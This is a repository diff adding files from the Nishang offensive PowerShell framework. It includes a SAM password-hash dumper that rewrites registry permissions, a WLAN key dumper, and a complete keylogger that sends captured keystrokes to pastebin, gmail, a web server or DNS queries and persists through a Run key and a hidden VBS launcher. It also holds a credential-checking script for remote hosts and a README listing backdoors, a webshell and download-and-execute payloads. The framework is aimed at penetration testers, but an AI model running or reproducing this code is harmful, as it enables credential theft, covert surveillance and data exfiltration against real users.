1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
);
function sid_to_key($sid)
{
$s1 = @();
$s1 += [char]($sid -band 0xFF);
$s1 += [char]([Shift]::Right($sid,8) -band 0xFF);
$s1 += [char]([Shift]::Right($sid,16) -band 0xFF);
$s1 += [char]([Shift]::Right($sid,24) -band 0xFF);
$s1 += $s1[0];
$s1 += $s1[1];
$s1 += $s1[2];
$s2 = @();
$s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2];
$s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2];
return ,((str_to_key $s1),(str_to_key $s2));
}
function str_to_key($s)
{
$key = @();
$key += [Shift]::Right([int]($s[0]), 1 );
$key += [Shift]::Left( $([int]($s[0]) -band 0x01), 6) -bor [Shift]::Right([int]($s[1]),2);
$key += [Shift]::Left( $([int]($s[1]) -band 0x03), 5) -bor [Shift]::Right([int]($s[2]),3);
$key += [Shift]::Left( $([int]($s[2]) -band 0x07), 4) -bor [Shift]::Right([int]($s[3]),4);
$key += [Shift]::Left( $([int]($s[3]) -band 0x0F), 3) -bor [Shift]::Right([int]($s[4]),5);
$key += [Shift]::Left( $([int]($s[4]) -band 0x1F), 2) -bor [Shift]::Right([int]($s[5]),6);
$key += [Shift]::Left( $([int]($s[5]) -band 0x3F), 1) -bor [Shift]::Right([int]($s[6]),7);
$key += $([int]($s[6]) -band 0x7F);
0..7 | %{
$key[$_] = [Shift]::Left($key[$_], 1);
$key[$_] = $odd_parity[$key[$_]];
}
return ,$key;
}
function NewRC4([byte[]]$key)
{
return new-object Object |
Add-Member NoteProperty key $key -PassThru |
Add-Member NoteProperty S $null -PassThru |
Add-Member ScriptMethod init {
if (-not $this.S)
{
[byte[]]$this.S = 0..255;
0..255 | % -begin{[long]$j=0;}{
$j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length;
$temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp;
}
}
} -PassThru |
Add-Member ScriptMethod "encrypt" {
$data = $args[0];
$this.init();
$outbuf = new-object byte[] $($data.Length);
$S2 = $this.S[0..$this.S.Length];
0..$($data.Length-1) | % -begin{$i=0;$j=0;} {
$i = ($i+1) % $S2.Length;
$j = ($j + $S2[$i]) % $S2.Length;
$temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp;
$a = $data[$_];
$b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
$outbuf[$_] = ($a -bxor $b);
}
return ,$outbuf;
} -PassThru
}
function des_encrypt([byte[]]$data, [byte[]]$key)
{
return ,(des_transform $data $key $true)
}
function des_decrypt([byte[]]$data, [byte[]]$key)
{
return ,(des_transform $data $key $false)
}
function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)
{
$des = new-object Security.Cryptography.DESCryptoServiceProvider;
$des.Mode = [Security.Cryptography.CipherMode]::ECB;
$des.Padding = [Security.Cryptography.PaddingMode]::None;
$des.Key = $key;
$des.IV = $key;
$transform = $null;
if ($doEncrypt) {$transform = $des.CreateEncryptor();}
else{$transform = $des.CreateDecryptor();}
$result = $transform.TransformFinalBlock($data, 0, $data.Length);
return ,$result;
}
function Get-RegKeyClass([string]$key, [string]$subkey)
{
switch ($Key) {
"HKCR" { $nKey = 0x80000000} #HK Classes Root
"HKCU" { $nKey = 0x80000001} #HK Current User
"HKLM" { $nKey = 0x80000002} #HK Local Machine
"HKU" { $nKey = 0x80000003} #HK Users
"HKCC" { $nKey = 0x80000005} #HK Current Config
default {
throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
}
}
$KEYQUERYVALUE = 0x1;
$KEYREAD = 0x19;
$KEYALLACCESS = 0x3F;
$result = "";
[int]$hkey=0
if (-not [PowerDump.Native]::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey))
{
$classVal = New-Object Text.Stringbuilder 1024
[int]$len = 1024
if (-not [PowerDump.Native]::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null,
[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0))
{
$result = $classVal.ToString()
}
else
{
Write-Error "RegQueryInfoKey failed";
}
[PowerDump.Native]::RegCloseKey($hkey) | Out-Null
}
else
{
Write-Error "Cannot open key";
}
return $result;
}
function Get-BootKey
{
$s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"}));
$b = new-object byte[] $($s.Length/2);
0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)}
$b2 = new-object byte[] 16;
0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++}
return ,$b2;
}
function Get-HBootKey
{
param([byte[]]$bootkey);
$aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0");
$anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0");
$k = Get-Item HKLM:\SAM\SAM\Domains\Account;
if (-not $k) {return $null}
[byte[]]$F = $k.GetValue("F");
if (-not $F) {return $null}
$rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum);
$rc4 = NewRC4 $rc4key;
return ,($rc4.encrypt($F[0x80..0x9F]));
}
function Get-UserName([byte[]]$V)
{
if (-not $V) {return $null};
$offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
$len = [BitConverter]::ToInt32($V[0x10..0x13],0);
return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
}
function Get-UserHashes($u, [byte[]]$hbootkey)
{
[byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;
if ($u.HashOffset + 0x28 -lt $u.V.Length)
{
$lm_hash_offset = $u.HashOffset + 4;
$nt_hash_offset = $u.HashOffset + 8 + 0x10;
$enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
$enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
}
elseif ($u.HashOffset + 0x14 -lt $u.V.Length)
{
$nt_hash_offset = $u.HashOffset + 8;
$enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
}
return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey);
}
function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)
{
[byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt;
# LM Hash
if ($enc_lm_hash)
{
$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
}
# NT Hash
if ($enc_nt_hash)
{
$nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword;
}
return ,($lmhash,$nthash)
}
function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)
{
$deskeys = sid_to_key $rid;
$md5 = [Security.Cryptography.MD5]::Create();
$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
$rc4 = NewRC4 $rc4_key;
$obfkey = $rc4.encrypt($enc_hash);
$hash = (des_decrypt $obfkey[0..7] $deskeys[0]) +
(des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]);
return ,$hash;
}
function Get-UserKeys
{
ls HKLM:\SAM\SAM\Domains\Account\Users |
where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} |
Add-Member AliasProperty KeyName PSChildName -PassThru |
Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru |
Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru |
Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru
}
function DumpHashes
{
LoadApi
$bootkey = Get-BootKey;
$hbootKey = Get-HBootKey $bootkey;
Get-UserKeys | %{
$hashes = Get-UserHashes $_ $hBootKey;
"{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid,
[BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(),
[BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
}
}
#http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Write-Warning "Script requires elevated or administrative privileges."
Return
}
else
{
#Set permissions for the current user.
$rule = New-Object System.Security.AccessControl.RegistryAccessRule (
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
"FullControl",
[System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
[System.Security.AccessControl.PropagationFlags]"None",
[System.Security.AccessControl.AccessControlType]"Allow")
$key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
"SAM\SAM\Domains",
[Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
[System.Security.AccessControl.RegistryRights]::ChangePermissions)
$acl = $key.GetAccessControl()
$acl.SetAccessRule($rule)
$key.SetAccessControl($acl)
DumpHashes
#Remove the permissions added above.
$user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
Set-Acl HKLM:\SAM\SAM\Domains $acl
}
}

28
aspx/nishang/Gather/Get-WLAN-Keys.ps1 Normal file
View file

@ -0,0 +1,28 @@
<#
.SYNOPSIS
Nishang Payload which dumps keys for WLAN profiles.
.DESCRIPTION
This payload dumps keys in clear text for saved WLAN profiles.
The payload must be run from as administrator to get the keys.
.EXAMPLE
PS > Get-WLAN-Keys
.LINK
http://poshcode.org/1700
https://github.com/samratashok/nishang
#>
function Get-Wlan-Keys
{
[CmdletBinding()]
Param ()
$wlans = netsh wlan show profiles | Select-String -Pattern "All User Profile" | Foreach-Object {$_.ToString()}
$exportdata = $wlans | Foreach-Object {$_.Replace(" All User Profile : ",$null)}
$exportdata | ForEach-Object {netsh wlan show profiles name="$_" key=clear}
}

388
aspx/nishang/Gather/Keylogger.ps1 Normal file
View file

@ -0,0 +1,388 @@
<#
.SYNOPSIS
Nishang Payload which logs keys.
.DESCRIPTION
This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory.
The keys are than pasted to pastebin|tinypaste|gmail|all as per selection. Saved keys could then be decoded
using the Parse_Key script in nishang.
.PARAMETER persist
Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName
.PARAMETER MagicString
The string which when found at CheckURL will stop the keylogger.
.PARAMETER CheckURL
The URL which would contain the MagicString used to stop keylogging.
.EXAMPLE
PS > .\Keylogger.ps1
The payload will ask for all required options.
.EXAMPLE
PS > .\Keylogger.ps1 http://example.com stopthis
Use above when using the payload from non-interactive shells and no exfiltration is required.
.EXAMPLE
PS > .\Keylogger.ps1 http://example.com stopthis -exfil <dev_key> <username> <pass> 3
Use above when using the payload from non-interactive shells or you don't want the payload to ask for any options.
.EXAMPLE
PS > .\Keylogger.ps1 -persist
Use above for reboot persistence.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
[Parameter(Parametersetname="exfil")]
[Switch]
$persist,
[Parameter(Parametersetname="exfil")]
[Switch]
$exfil,
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
[String]
$CheckURL,
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
[String]
$MagicString,
[Parameter(Position = 2, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 3, Mandatory = $False, Parametersetname="exfil")]
[String]
$dev_key = "null",
[Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")]
[String]
$username = "null",
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
[String]
$password = "null",
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
[String]
$URL = "null",
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
[String]
$DomainName = "null",
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
[String]
$AuthNS = "null"
)
$functions = {
function Keylogger
{
Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]
$MagicString,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$CheckURL
)
$signature = @"
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
"@
$getKeyState = Add-Type -memberDefinition $signature -name "Newtype" -namespace newnamespace -passThru
$check = 0
while ($true)
{
Start-Sleep -Milliseconds 40
$logged = ""
$result=""
$shift_state=""
$caps_state=""
for ($char=1;$char -le 254;$char++)
{
$vkey = $char
$logged = $getKeyState::GetAsyncKeyState($vkey)
if ($logged -eq -32767)
{
if(($vkey -ge 48) -and ($vkey -le 57))
{
$left_shift_state = $getKeyState::GetAsyncKeyState(160)
$right_shift_state = $getKeyState::GetAsyncKeyState(161)
if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
{
$result = "S-" + $vkey
}
else
{
$result = $vkey
}
}
elseif(($vkey -ge 64) -and ($vkey -le 90))
{
$left_shift_state = $getKeyState::GetAsyncKeyState(160)
$right_shift_state = $getKeyState::GetAsyncKeyState(161)
$caps_state = [console]::CapsLock
if(!(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) -xor $caps_state)
{
$result = "S-" + $vkey
}
else
{
$result = $vkey
}
}
elseif((($vkey -ge 186) -and ($vkey -le 192)) -or (($vkey -ge 219) -and ($vkey -le 222)))
{
$left_shift_state = $getKeyState::GetAsyncKeyState(160)
$right_shift_state = $getKeyState::GetAsyncKeyState(161)
if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
{
$result = "S-" + $vkey
}
else
{
$result = $vkey
}
}
else
{
$result = $vkey
}
$now = Get-Date;
$logLine = "$result "
$filename = "$env:temp\key.log"
Out-File -FilePath $fileName -Append -InputObject "$logLine"
}
}
$check++
if ($check -eq 6000)
{
$webclient = New-Object System.Net.WebClient
$filecontent = $webclient.DownloadString("$CheckURL")
if ($filecontent -eq $MagicString)
{
break
}
$check = 0
}
}
}
function Keypaste
{
Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]
$ExfilOption,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$dev_key,
[Parameter(Position = 2, Mandatory = $True)]
[String]
$username,
[Parameter(Position = 3, Mandatory = $True)]
[String]
$password,
[Parameter(Position = 4, Mandatory = $True)]
[String]
$URL,
[Parameter(Position = 5, Mandatory = $True)]
[String]
$AuthNS,
[Parameter(Position = 6, Mandatory = $True)]
[String]
$MagicString,
[Parameter(Position = 7, Mandatory = $True)]
[String]
$CheckURL
)
$check = 0
while($true)
{
$read = 0
Start-Sleep -Seconds 5
$pastevalue=Get-Content $env:temp\key.log
$read++
if ($read -eq 30)
{
Out-File -FilePath $env:temp\key.log -Force -InputObject " "
$read = 0
}
$now = Get-Date;
$name = $env:COMPUTERNAME
$paste_name = $name + " : " + $now.ToUniversalTime().ToString("dd/MM/yyyy HH:mm:ss:fff")
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $pastevalue)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($encdata)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$Compressed
}
if ($exfiloption -eq "pastebin")
{
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = smtp.gmail.com
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential($username, $password);
$msg.From = $username@gmail.com
$msg.To.Add($username@gmail.com)
$msg.Subject = $pastename
$msg.Body = $pastevalue
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$code = Compress-Encode
$lengthofsubstr = 0
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomaName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
}
$check++
if ($check -eq 6000)
{
$check = 0
$webclient = New-Object System.Net.WebClient
$filecontent = $webclient.DownloadString("$CheckURL")
if ($filecontent -eq $MagicString)
{
break
}
}
}
}
}
$modulename = $script:MyInvocation.MyCommand.Name
if($persist -eq $True)
{
$name = "persist.vbs"
$options = "start-job -InitializationScript `$functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)"
$options2 = "start-job -InitializationScript `$functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)"
$func = $functions.Tostring()
Out-File -InputObject '$functions = {' -Force $env:TEMP\$modulename
Out-File -InputObject $func -Append $env:TEMP\$modulename
Out-File -InputObject '}' -Append -NoClobber $env:TEMP\$modulename
Out-File -InputObject $options -Append -NoClobber $env:TEMP\$modulename
Out-File -InputObject $options2 -Append -NoClobber $env:TEMP\$modulename
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -noexit -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
}
else
{
if ($exfil -eq $True)
{
start-job -InitializationScript $functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)
start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)
}
else
{
Keylogger $MagicString $CheckURL
}
}

BIN
aspx/nishang/Misc/Nishang_Logo.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 5 KiB

BIN
aspx/nishang/Misc/Nishang_logo_small.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 1.1 KiB

31
aspx/nishang/Misc/Speak.ps1 Normal file
View file

@ -0,0 +1,31 @@
<#
.SYNOPSIS
Nishang Payload to which "speaks" the given sentence
.DESCRIPTION
This payload uses the Speech API and the given senetence
is spoken in the MS Narrator's voice.
.PARAMETER Sentence
The sentence to be spoken
.EXAMPLE
PS > Speak <senetence>
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Speak
{
Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$Sentence
)
(new-object -com SAPI.SpVoice).speak("$Sentence")
}

104
aspx/nishang/Pivot/Create-MultipleSessions.ps1 Normal file
View file

@ -0,0 +1,104 @@
<#
.SYNOPSIS
Nishang script which can check for credentials on remote computers and can open PSSessions if the credentials work.
.DESCRIPTION
The payload uses WMI to check a credential against given list of computers. Use the -Creds parameter to specify username and password. If the script is run
from a powershell session with local or global admin credentials (or from a powershell session started with hashes of such account using WCE), it should be used
without the -Creds parameter. Use the -CreateSessions parameter to create PSSessions.
.PARAMETER filename
Path to the file which stores list of servers.
.PARAMETER Creds
Use this parameter to specify username (in form of domain\username) and password.
.PARAMETER CreateSessions
Use this parameter to make the script create PSSessions to targets on which the credentials worked.
.PARAMETER VerboseErrors
Use this parameter to get verbose error messages.
.EXAMPLE
PS > Create-MultipleSessions -filename .\servers.txt
Above command uses the credentials available with current powershell session and checks it against multiple computers specified in servers.txt
.EXAMPLE
PS > Create-MultipleSessions -filename .\servers.txt -Creds
Above command asks the user to provide username and passowrd to check on remote computers.
.EXAMPLE
PS > Create-MultipleSessions -filename .\servers.txt -CreateSessions
Above command uses the credentials available with current powershell session, checks it against multiple computers specified in servers.txt and creates PSSession for those.
.LINK
http://labofapenetrationtester.blogspot.com/2013/04/poshing-the-hashes.html
https://github.com/samratashok/nishang
#>
function Create-MultipleSessions
{
[CmdletBinding()] Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]
$filename,
[Parameter(Mandatory = $False)]
[Switch]
$Creds,
[Parameter(Mandatory = $False)]
[Switch]
$CreateSessions,
[Parameter(Mandatory = $False)]
[Switch]
$VerboseErrors
)
$ErrorActionPreference = "SilentlyContinue"
if ($VerboseErrors)
{
$ErrorActionPreference = "Continue"
}
$servers = Get-Content $filename
if ($Creds)
{
$Credentials = Get-Credential
$CheckCommand = 'gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server -Credential $Credentials'
$SessionCommand = 'New-PSSession -ComputerName $server -Credential $Credentials'
}
else
{
$CheckCommand = 'gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server'
$SessionCommand = 'New-PSSession -ComputerName $server'
}
foreach ($server in $servers)
{
$check = Invoke-Expression $CheckCommand
if($check -ne $null)
{
Write-Host "Credentials worked on $server !!" -ForegroundColor Green
if ($CreateSessions -eq $True)
{
"`nCreating Session for $server"
Invoke-Expression $SessionCommand
}
}
else
{
"Could not connect or credentials didn't work on $server"
}
}
if ($CreateSessions -eq $True)
{
Write-Host "`nFollowing Sessions have been created: " -ForegroundColor Green
Get-PSSession
}
}

77
aspx/nishang/Pivot/Run-EXEonRemote.ps1 Normal file
View file

File diff suppressed because one or more lines are too long

122
aspx/nishang/Prasadhak/Prasadhak.ps1 Normal file
View file

@ -0,0 +1,122 @@
#Requires -Version 3
<#
.SYNOPSIS
Nishang script which checks running processes for malwares.
.DESCRIPTION
This script uses takes md5 hashes of running processes (the correspondibg executable)
on the target system and search the hashes in the Virustotal database using the Public API.
.PARAMETER APIKEY
THe APIKEY provided when someone registers to virustotal
.EXAMPLE
PS > Prasadhak 1fe0ef5feca2f84eb450bc3617f839e317b2a686af4d651a9bada77a522201b0
.LINK
http://www.labofapenetrationtester.com/2013/01/introducing-prasadhak.html
https://github.com/samratashok/nishang
.Notes
The word Prasadhak means purifier in Sanskrit language.
#>
function Prasadhak
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$apikey
)
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:response = $http_request.responseText
}
function check
{
$res = $response | ConvertFrom-JSON
foreach ($code in $res)
{
#$proc1[$track]
if ($code.response_code -eq 0)
{
Write-Host "Not found in VT database. " #+ $proc1[$track]
}
elseif (($code.response_code -eq 1) -and ($code.positives -ne 0))
{
Write-Host "Something malicious is found. " -ForegroundColor Red # $proc1[$track]
$code.Permalink
}
elseif (($code.response_code -eq 1))
{
Write-Host "This is reported clean. " -ForegroundColor Green # $proc1[$track]
}
elseif ($res.response_code -eq -2)
{
"File queued for analysis. " #+ $proc1[$track]
$code.Permalink
}
#$track++
}
}
$ErrorActionPreference = "SilentlyContinue"
$iteration = 0
$count = 0
$reqcount = 0
[String[]]$hash = @()
#[String[]]$procname = @()
"Reading Processes and determining executables."
Start-Sleep -Seconds 3
$procs = (Get-Process).path
$procnumber = Get-Process | Measure-Object -line
"Total Processes detected: " + $procnumber.lines
"Total Processes for which executables were detected: " + $procs.length
Start-Sleep -Seconds 3
foreach ($proc in $procs)
{
$md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider #http://stackoverflow.com/questions/10521061/how-to-get-a-md5-checksum-in-powershell
$hash = $hash + "," + [System.BitConverter]::ToString($md5.ComputeHash([System.IO.File]::ReadAllBytes($proc))).Replace("-", "").ToLower()
#$procname = $procname + $proc
if ((($count -eq 25) -and (($procs.length - 25) -ge 0)) -or ($procs.Length -lt 25) -or (($iteration -ge 1) -and ((($procs.length - (25 * $iteration)) - 1) -eq $count)))
{
Post_http "https://www.virustotal.com/vtapi/v2/file/report" "resource=$hash&apikey=$apikey"
check
$hash = 0
$count = 0
$reqcount++
$iteration++
}
if ($reqcount -eq 4)
{
"Waiting for one minute as VT allows only 4 requests per minute."
Start-Sleep -seconds 60
$reqcount = 0
}
$count++
}
}

201
aspx/nishang/README.md Normal file
View file

@ -0,0 +1,201 @@
#Nishang
###Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security usage and during Penetraion Tests. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.
####Scripts
Nishang currently contains following scripts and payloads.
#####Antak - the Webshell
[Antak](https://github.com/samratashok/nishang/tree/master/Antak-WebShell)
Execute powershell scripts in-memory, commands, download and upload files using this webshell.
#####Backdoors
[HTTP-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/HTTP-Backdoor.ps1)
A backdoor which is capable to recieve instructions from third party websites and could execute powershell scripts in memory.
[DNS_TXT_Pwnage](https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1)
A Backdoor which could recieve commands and powershell scripts from DNS TXT queries and execute those on target and could be controlled remotely using the queries.
[Execute-OnTime](https://github.com/samratashok/nishang/blob/master/Backdoors/Execute-OnTime.ps1)
A Backdoor which could execute powershell scripts on a given time on a target.
#####Escalation
[Enable-DuplicateToken](https://github.com/samratashok/nishang/blob/master/Escalation/Enable-DuplicateToken.ps1)
When SYSTEM privileges are required.
[Remove-Update](https://github.com/samratashok/nishang/blob/master/Escalation/Remove-Update.ps1)
Introduce vulnerabilites by removing patches.
#####Execution
[Download-Execute-PS](https://github.com/samratashok/nishang/blob/master/Execution/Download-Execute-PS.ps1)
Download and execute a powershell script in memory.
